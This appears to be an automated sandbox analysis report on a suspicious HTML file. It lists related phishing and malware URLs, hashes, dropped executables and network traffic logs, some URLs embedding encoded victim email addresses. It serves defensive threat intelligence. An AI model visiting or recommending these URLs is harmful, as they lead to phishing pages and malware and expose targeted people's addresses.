	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//geniebroots%E3%80%82com/phpfile/rahc0c1ro5ianbggqwkdsf6ufnn7jolo15webcflp0bnelsrujohtelw4knxh4muirbbwpiqnmxhw6o71vktxvreda3oowswwrljf27it3s4puewrgrigembujrth68xupzhbegfezobam8bfk3mb02lfrpso4xqk2v5670icpargpmkvtelqoszhiqzhwjnv6aemhyk/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU=	Get hash	malicious	HTMLPhisher	Browse
	http://2540.bacargrow.live	Get hash	malicious	Unknown	Browse
	https://me-qr.com/btGspXT0	Get hash	malicious	Unknown	Browse
	http://agoda.onelink.me/1640755593?pid=Email&c=inquiry_booking&af_dp=agoda%3A%2F%2Fhotel%2FAgoda%2520ABS%2520Dummy%2F2544216%26temp%3D0&adults=2&children=0&rooms=1&checkIn=2022-02-17&checkOut=2022-02-20&los=3&cid=1772772&af_force_dp=true&af_r=////demoboxes.biz/css/Hyperoptic.com/owls/mclap/bWFyay5jdW5uaW5naGFtQGh5cGVyb3B0aWMuY29t	Get hash	malicious	Unknown	Browse
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//baidu.com///link?url=T6L2xPWnc7Y1hPij6Qix4uQPIFUW-MXpvBbStD1u60Vfpt2BI8qjzSoSBbtobhAJ&wd#.YWFyb25AdGV4dHVtLmNvbQ==	Get hash	malicious	Unknown	Browse
	https://fundamental-learning.com/MAILING/mail-restrictions/?email=test@test.be	Get hash	malicious	HTMLPhisher	Browse
	https://sites.google.com/view/dsiezvef/accueil	Get hash	malicious	Unknown	Browse
	https://zestardshop.com/shopifyapp/DeliveryDatePro/public/js/snippets.js	Get hash	malicious	Unknown	Browse
151.101.66.137	2023121142000021ki01kvjs.html	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-latest.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	https://link.mail.beehiiv.com/ls/click?upn=o9n-2BPZJ9HxY-2BNn0NsKjT5hUBhVht-2FstIZ3fJt4NbrOvKz6rAIvnISg1OV8uRo7ULUtfftPBEHmlKICRhc9FRLw-3D-3DSwbx_8h-2BnX6CIr-2F7ENp3fro50yo7otB0zihj3cDKf16oOl5ECQxgvF1GsvMc2NU74YEvFzDDMtl3iNJ-2BgBRLrbLvfIODmtN9Vmt58usUhQbyQHodO4bf4CP2smfCpLk2lhVEZzA6hXqrAtqtIJStx719Az2RtYNfHIorpHOVPRA8cDd8lJuL2f3nmmfrJnSfLJ-2FP9XbGQBCT742Zbax7Urhc3lNdPN5sVEg-2FTP1u7HgZ4wOmo7IpbdZoBmSGr0Qo-2BMCkXaxc7oYAbc05G7GjASEmPPcxA7adZGSPSGDLQLPGIJ2r-2FMZJcq7VQildG6sYjZH73q7aDwL6Bj3vXGH7iCx5Ay6UJT6t2L4AXlR2DchepFsjSahQSvP-2Bqg3ASSxrsb8MXUcwmnAVR2lLmDawQXjRay76dC3Y-2BORmxtQNE3RsB8piTDp2g5rBTIO-2BYip9PB0JgoPQfYX9vN2RYkheOMFbZBA-3D-3D#bXRyQG5vdm96eW1lcy5jb20=	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//dreamgirlhairextensions.com/html/xtml/MLNWDH1LH58S66ZQIMFNGP7S45_=/.filepage/vivi//ap@dhre.ae	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://loakiakaka-2020kdmd.weeblysite.com/	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://gwrepermits.com/into/wait/before/logins/info.php	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://goldenocalarealestate-af3.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://oyster-app-wfmt9.ondigitalocean.app/w5/?tel=1-833-321-0248	Get hash	malicious	TechSupportScam	Browse	151.101.130.137
	https://www.socialvolunteerofbangladesh.org/0190280.html	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://attcom-100190.weeblysite.com/	Get hash	malicious	Unknown	Browse	151.101.66.137
	INV0ICE_988874738877.htm	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://r.smartbrief.com/resp/rFdjCeuwAqDzbViPCigydcCicNXgtH?format=multipart	Get hash	malicious	Unknown	Browse	151.101.2.137

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	file.exe	Get hash	malicious	Vidar	Browse	88.198.191.199
	https://www.socialvolunteerofbangladesh.org/0190280.html	Get hash	malicious	HTMLPhisher	Browse	136.243.90.249
	6SWa3A8x8P.exe	Get hash	malicious	RedLine	Browse	5.75.211.197
	http://thegillcorp.com	Get hash	malicious	Unknown	Browse	78.46.117.148
	http://www.corevents.org	Get hash	malicious	Unknown	Browse	5.9.177.100
	http://es25019.knas32.ru	Get hash	malicious	Unknown	Browse	88.198.200.36
	SecuriteInfo.com.Trojan.Win32.Crypt.9865.26501.exe	Get hash	malicious	Socks5Systemz	Browse	176.9.47.240
	r01-25Arrival.exe	Get hash	malicious	FormBook	Browse	46.4.135.10
	http://www.thegillcorp.com/	Get hash	malicious	Unknown	Browse	78.46.117.148
	SecuriteInfo.com.Trojan.Win32.Crypt.8573.6873.exe	Get hash	malicious	Socks5Systemz	Browse	176.9.47.240
FASTLYUS	https://link.mail.beehiiv.com/ls/click?upn=o9n-2BPZJ9HxY-2BNn0NsKjT5hUBhVht-2FstIZ3fJt4NbrOvKz6rAIvnISg1OV8uRo7ULUtfftPBEHmlKICRhc9FRLw-3D-3DSwbx_8h-2BnX6CIr-2F7ENp3fro50yo7otB0zihj3cDKf16oOl5ECQxgvF1GsvMc2NU74YEvFzDDMtl3iNJ-2BgBRLrbLvfIODmtN9Vmt58usUhQbyQHodO4bf4CP2smfCpLk2lhVEZzA6hXqrAtqtIJStx719Az2RtYNfHIorpHOVPRA8cDd8lJuL2f3nmmfrJnSfLJ-2FP9XbGQBCT742Zbax7Urhc3lNdPN5sVEg-2FTP1u7HgZ4wOmo7IpbdZoBmSGr0Qo-2BMCkXaxc7oYAbc05G7GjASEmPPcxA7adZGSPSGDLQLPGIJ2r-2FMZJcq7VQildG6sYjZH73q7aDwL6Bj3vXGH7iCx5Ay6UJT6t2L4AXlR2DchepFsjSahQSvP-2Bqg3ASSxrsb8MXUcwmnAVR2lLmDawQXjRay76dC3Y-2BORmxtQNE3RsB8piTDp2g5rBTIO-2BYip9PB0JgoPQfYX9vN2RYkheOMFbZBA-3D-3D#bXRyQG5vdm96eW1lcy5jb20=	Get hash	malicious	Unknown	Browse	151.101.194.137
	http://agoda.onelink.me/1640755593?pid=Email&c=inquiry_booking&af_dp=agoda%3A%2F%2Fhotel%2FAgoda%2520ABS%2520Dummy%2F2544216%26temp%3D0&adults=2&children=0&rooms=1&checkIn=2022-02-17&checkOut=2022-02-20&los=3&cid=1772772&af_force_dp=true&af_r=////demoboxes.biz/css/Hyperoptic.com/owls/mclap/bWFyay5jdW5uaW5naGFtQGh5cGVyb3B0aWMuY29t	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//dreamgirlhairextensions.com/html/xtml/MLNWDH1LH58S66ZQIMFNGP7S45_=/.filepage/vivi//ap@dhre.ae	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://tap-rt-prod1-t.campaign.adobe.com/r/?id=h9ecb88b,c1e96b3,69fe0fb&p1=lqcg8wqxyd8l5pmy.lgknhorh4twvs8q.ru/Zmf1Kr7pqJGcon9pWrbxzO9nNqH0O/#0dG9tLmJpbGJydWNrQGNhbnlvbnMuZWR1	Get hash	malicious	HTMLPhisher	Browse	151.101.65.229
	https://loakiakaka-2020kdmd.weeblysite.com/	Get hash	malicious	Unknown	Browse	151.101.129.46
	http://peyon.fun/web/index.html	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://massimotamburrino.com/dhI/	Get hash	malicious	Unknown	Browse	151.101.1.229
	https://gwrepermits.com/into/wait/before/logins/info.php	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://goldenocalarealestate-af3.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://oyster-app-wfmt9.ondigitalocean.app/w5/?tel=1-833-321-0248	Get hash	malicious	TechSupportScam	Browse	151.101.130.137

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//geniebroots%E3%80%82com/phpfile/rahc0c1ro5ianbggqwkdsf6ufnn7jolo15webcflp0bnelsrujohtelw4knxh4muirbbwpiqnmxhw6o71vktxvreda3oowswwrljf27it3s4puewrgrigembujrth68xupzhbegfezobam8bfk3mb02lfrpso4xqk2v5670icpargpmkvtelqoszhiqzhwjnv6aemhyk/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU=	Get hash	malicious	HTMLPhisher	Browse	23.1.237.25
	sPa8D24P5D.exe	Get hash	malicious	Amadey, PureLog Stealer, Xmrig, zgRAT	Browse	23.1.237.25
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//baidu.com///link?url=T6L2xPWnc7Y1hPij6Qix4uQPIFUW-MXpvBbStD1u60Vfpt2BI8qjzSoSBbtobhAJ&wd#.YWFyb25AdGV4dHVtLmNvbQ==	Get hash	malicious	Unknown	Browse	23.1.237.25
	https://fundamental-learning.com/MAILING/mail-restrictions/?email=test@test.be	Get hash	malicious	HTMLPhisher	Browse	23.1.237.25
	https://sites.google.com/view/dsiezvef/accueil	Get hash	malicious	Unknown	Browse	23.1.237.25
	http://93.123.85.149/x0ox0ox0oxDefault/z0r0.x86	Get hash	malicious	Unknown	Browse	23.1.237.25
	https://massimotamburrino.com/dhI/	Get hash	malicious	Unknown	Browse	23.1.237.25
	https://orange-wind-1189.on.fleek.co/	Get hash	malicious	Unknown	Browse	23.1.237.25
	https://oyster-app-wfmt9.ondigitalocean.app/w5/?tel=1-833-321-0248	Get hash	malicious	TechSupportScam	Browse	23.1.237.25
	https://update-metamask.pages.dev/	Get hash	malicious	Unknown	Browse	23.1.237.25
28a2c9bd18a11de089ef85a160da29e4	https://link.mail.beehiiv.com/ls/click?upn=o9n-2BPZJ9HxY-2BNn0NsKjT5hUBhVht-2FstIZ3fJt4NbrOvKz6rAIvnISg1OV8uRo7ULUtfftPBEHmlKICRhc9FRLw-3D-3DSwbx_8h-2BnX6CIr-2F7ENp3fro50yo7otB0zihj3cDKf16oOl5ECQxgvF1GsvMc2NU74YEvFzDDMtl3iNJ-2BgBRLrbLvfIODmtN9Vmt58usUhQbyQHodO4bf4CP2smfCpLk2lhVEZzA6hXqrAtqtIJStx719Az2RtYNfHIorpHOVPRA8cDd8lJuL2f3nmmfrJnSfLJ-2FP9XbGQBCT742Zbax7Urhc3lNdPN5sVEg-2FTP1u7HgZ4wOmo7IpbdZoBmSGr0Qo-2BMCkXaxc7oYAbc05G7GjASEmPPcxA7adZGSPSGDLQLPGIJ2r-2FMZJcq7VQildG6sYjZH73q7aDwL6Bj3vXGH7iCx5Ay6UJT6t2L4AXlR2DchepFsjSahQSvP-2Bqg3ASSxrsb8MXUcwmnAVR2lLmDawQXjRay76dC3Y-2BORmxtQNE3RsB8piTDp2g5rBTIO-2BYip9PB0JgoPQfYX9vN2RYkheOMFbZBA-3D-3D#bXRyQG5vdm96eW1lcy5jb20=	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	http://Sbm-Sbm.onlinemailmicrosotfvalidation.com/?s=di5jYWxhbWVAc2JtLm1j	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//geniebroots%E3%80%82com/phpfile/rahc0c1ro5ianbggqwkdsf6ufnn7jolo15webcflp0bnelsrujohtelw4knxh4muirbbwpiqnmxhw6o71vktxvreda3oowswwrljf27it3s4puewrgrigembujrth68xupzhbegfezobam8bfk3mb02lfrpso4xqk2v5670icpargpmkvtelqoszhiqzhwjnv6aemhyk/anVlcmdlbi5zZWlkbGVyQGlwcm90ZXguZGU=	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	http://2540.bacargrow.live	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	https://me-qr.com/btGspXT0	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	http://agoda.onelink.me/1640755593?pid=Email&c=inquiry_booking&af_dp=agoda%3A%2F%2Fhotel%2FAgoda%2520ABS%2520Dummy%2F2544216%26temp%3D0&adults=2&children=0&rooms=1&checkIn=2022-02-17&checkOut=2022-02-20&los=3&cid=1772772&af_force_dp=true&af_r=////demoboxes.biz/css/Hyperoptic.com/owls/mclap/bWFyay5jdW5uaW5naGFtQGh5cGVyb3B0aWMuY29t	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	https://ad.doubleclick.net/clk;265186560;90846275;t;pc=%5BTPAS_ID%5D?//baidu.com///link?url=T6L2xPWnc7Y1hPij6Qix4uQPIFUW-MXpvBbStD1u60Vfpt2BI8qjzSoSBbtobhAJ&wd#.YWFyb25AdGV4dHVtLmNvbQ==	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	https://fundamental-learning.com/MAILING/mail-restrictions/?email=test@test.be	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	https://sites.google.com/view/dsiezvef/accueil	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
	https://zestardshop.com/shopifyapp/DeliveryDatePro/public/js/snippets.js	Get hash	malicious	Unknown	Browse	13.85.23.86 173.222.162.7 204.79.197.222 13.107.42.254 13.89.179.11 13.107.219.254 40.126.28.12 20.187.64.58 23.1.237.25
6271f898ce5be7dd52b0fc260d0662b3	Incoming_Payment.svg	Get hash	malicious	AMSIReaper, AgentTesla, HTMLPhisher	Browse	13.107.21.200
	https://rnsindia.online/aa/_y.php?uni=truchc@deerequipment.com&aidna=Ki5ybnNpbmRpYS5vbmxpbmU==&u=ZXgzLnNhLmNvbS9zaHMvc3BzcHNwc3Bzc3Bzc3MvdHJ1Y2hjQGRlZXJlcXVpcG1lbnQuY29t	Get hash	malicious	Unknown	Browse	13.107.21.200
	PO0124.docx.doc	Get hash	malicious	Unknown	Browse	13.107.21.200
	Poste officiel	Get hash	malicious	Unknown	Browse	13.107.21.200
	https://storage.googleapis.com/edusa/algonquincollege.html#4oIXrT398LnkF32ajqxirfcrg4NWQPVFNZXVDZWNH1708863JDQB299741a9	Get hash	malicious	Phisher	Browse	13.107.21.200
	Accept Files.Docx	Get hash	malicious	Unknown	Browse	13.107.21.200
	Invoice164011.Docx	Get hash	malicious	Unknown	Browse	13.107.21.200
	z43FAC98656700.CMD.exe	Get hash	malicious	Remcos	Browse	13.107.21.200
	vRecording__57seconds__jacksonjet0213687.html. .dat	Get hash	malicious	Phisher	Browse	13.107.21.200
	http://segy.shop	Get hash	malicious	Unknown	Browse	13.107.21.200
3b5074b1b5d032e5620f69f9f700ff0e	https://zestardshop.com/shopifyapp/DeliveryDatePro/public/js/snippets.js	Get hash	malicious	Unknown	Browse	91.107.214.239
	SecuriteInfo.com.Variant.Ransom.Loki.1548.16542.13389.exe	Get hash	malicious	DarkTortilla, Remcos	Browse	91.107.214.239
	lala.exe	Get hash	malicious	Unknown	Browse	91.107.214.239
	lala.exe	Get hash	malicious	Unknown	Browse	91.107.214.239
	Quotation 5100276270, 5100276229, 5100276243.exe	Get hash	malicious	AgentTesla	Browse	91.107.214.239
	Notesvb.msi	Get hash	malicious	Unknown	Browse	91.107.214.239
	https://loakiakaka-2020kdmd.weeblysite.com/	Get hash	malicious	Unknown	Browse	91.107.214.239
	BILL93607.js	Get hash	malicious	NetSupport RAT	Browse	91.107.214.239
	6SWa3A8x8P.exe	Get hash	malicious	RedLine	Browse	91.107.214.239
	urBo9Q4ZQq.exe	Get hash	malicious	RHADAMANTHYS	Browse	91.107.214.239

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1661216
Entropy (8bit):	6.9296589811978535
Encrypted:	false
SSDEEP:	49152:Do4o2O9f65YTz7jGnD3D121zsax1KWMXz/qIFI2t7:DTMwrMIWMXOIG2t7
MD5:	A9C5924063A253F64FB86BC924BE6996
SHA1:	C39BA1E011318B3EDF295D4BDDE3D56B5DE89972
SHA-256:	EB1B278B91A8F183F9749948ABD9556EC21B03CA852C53E423D824D5D7CC3DE4
SHA-512:	57F0F5E8FA907D92FEB6175AB32253BFEF9F6ACF25E5CE3273F12FD428E76A07EC7C8FC007DC2C13DC0C6841222D8874FB7E362D7CBE70F287583782CD3D311E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....}e.........."......z..........T..........@..........................................`.................................................08..........H........l...... W...................................-..(...0...@............C...............................text....y.......z.................. ..`.rdata..d............~..............@..@.data....U..........................@....pdata...l.......n..................@..@.00cfg..8....p......................@..@.gxfg...`*.......,..................@..@.tls.................2..............@..._RDATA..\............4..............@..@.rsrc...H............6..............@..@.reloc........... ..................@..B........................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 26 08:16:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9817189348322
Encrypted:	false
SSDEEP:	48:8mOdZTFLlf8EHlidAKZdA1FehwiZUklqehey+3:8m8rf8Kty
MD5:	745F0F90C43EF4958D1790EC317AFF5E
SHA1:	F0394159F9A28675FDFF44F5E9D316F208011E71
SHA-256:	6278B65DF2A1F58B47CF6382F70FADDB3F3721DEDE1E92FED996163D910863AC
SHA-512:	A3DB464033284069229FD1555263CEB0CD69621B0C88157AA92CA6248A269FD5703FD89DC51CA3C5ED0B95443A27AFB7DF5A568DC1D33851E1B7E88B00FBD302
Malicious:	false
Preview:	L..................F.@.. ...$+.,......AK8P..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I:X.I....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V:X.J....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V:X.J....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V:X.J..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V:X.J...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.c.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	HTML document, Unicode text, UTF-8 text, with very long lines (31622), with CRLF line terminators
Entropy (8bit):	6.0914427178913675
TrID:	HyperText Markup Language (15015/1) 20.56% HyperText Markup Language (12001/1) 16.44% HyperText Markup Language (12001/1) 16.44% HyperText Markup Language (11501/1) 15.75% HyperText Markup Language (11501/1) 15.75%
File name:	HARUMQ.html
File size:	41'659 bytes
MD5:	5d5e4c768c448a7465639461b016f0b7
SHA1:	72996bdf38e508e83bfe02cbb9a7daab9118b336
SHA256:	9403f7e89f1c4150a261eb4ded3c35096ff0a2de079c2fc311c283ad9a7506a7
SHA512:	edb077ff1047712a4d132739c47b1845164d8bce42f43dff57c6b415adb3b811adb26e972d50f52a2a552492b8eda4e55dfc927f4d9f7f960202b5097dc8c7bf
SSDEEP:	768:mwBL+oAZizxCmaptUR6lUYWGLYrpVKS+3xVvMFDzh4VmUZcL:mA+oA0zxCmapioerpVKr3PGyVmUWL
TLSH:	2A13BF3A70132FAF6336DC1CF5360A60BCA94C7F4346D5F579A60AF193E0A6C42606E9
File Content Preview:	<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1.0">...<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>...<title>K0gCNsDdphXZK0gCNsjIgICIlVHbhZVLgQmc

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2024 10:16:03.777646065 CET	138	138	192.168.2.16	192.168.2.255
Jan 26, 2024 10:16:05.753295898 CET	50394	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:05.753514051 CET	63494	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:05.754195929 CET	54363	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:05.754379034 CET	50712	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:05.756289005 CET	50839	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:05.756489038 CET	49532	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:05.831722021 CET	53	50364	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:05.871731043 CET	53	50394	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:05.872369051 CET	53	63494	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:05.872473955 CET	53	54363	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:05.872612000 CET	53	50712	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:05.874576092 CET	53	50839	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:05.874758959 CET	53	49532	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:06.581161976 CET	53	62374	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:10.056713104 CET	60459	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:10.057430983 CET	51278	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:16:10.175436974 CET	53	60459	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:10.175940037 CET	53	51278	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:23.621021032 CET	53	60326	1.1.1.1	192.168.2.16
Jan 26, 2024 10:16:42.677212954 CET	53	52639	1.1.1.1	192.168.2.16
Jan 26, 2024 10:17:05.363583088 CET	53	62130	1.1.1.1	192.168.2.16
Jan 26, 2024 10:17:05.396028042 CET	53	57521	1.1.1.1	192.168.2.16
Jan 26, 2024 10:17:11.145349026 CET	59979	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:17:11.299540043 CET	53	59979	1.1.1.1	192.168.2.16
Jan 26, 2024 10:17:33.266062021 CET	53	56610	1.1.1.1	192.168.2.16
Jan 26, 2024 10:17:35.032922029 CET	61876	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:17:35.033267021 CET	60862	53	192.168.2.16	1.1.1.1
Jan 26, 2024 10:17:35.151812077 CET	53	61876	1.1.1.1	192.168.2.16
Jan 26, 2024 10:17:35.152412891 CET	53	60862	1.1.1.1	192.168.2.16

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:16:06 UTC	752	OUT	GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1 Host: clients2.google.com Connection: keep-alive X-Goog-Update-Interactivity: fg X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda X-Goog-Update-Updater: chromecrx-117.0.5938.132 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-01-26 09:16:06 UTC	731	IN	HTTP/1.1 200 OK Content-Security-Policy: script-src 'report-sample' 'nonce-1qCu9ZscxpY9DeUh7SwS8g' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jan 2024 09:16:06 GMT Content-Type: text/xml; charset=UTF-8 X-Daynum: 6234 X-Daystart: 4566 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-01-26 09:16:06 UTC	521	IN	Data Raw: 32 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 36 32 33 34 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 35 36 36 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22 20 Data Ascii: 2c8<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6234" elapsed_seconds="4566"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2024-01-26 09:16:06 UTC	198	IN	Data Raw: 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 2f 67 75 70 64 61 74 65 3e 0d 0a Data Ascii: 3f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2024-01-26 09:16:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
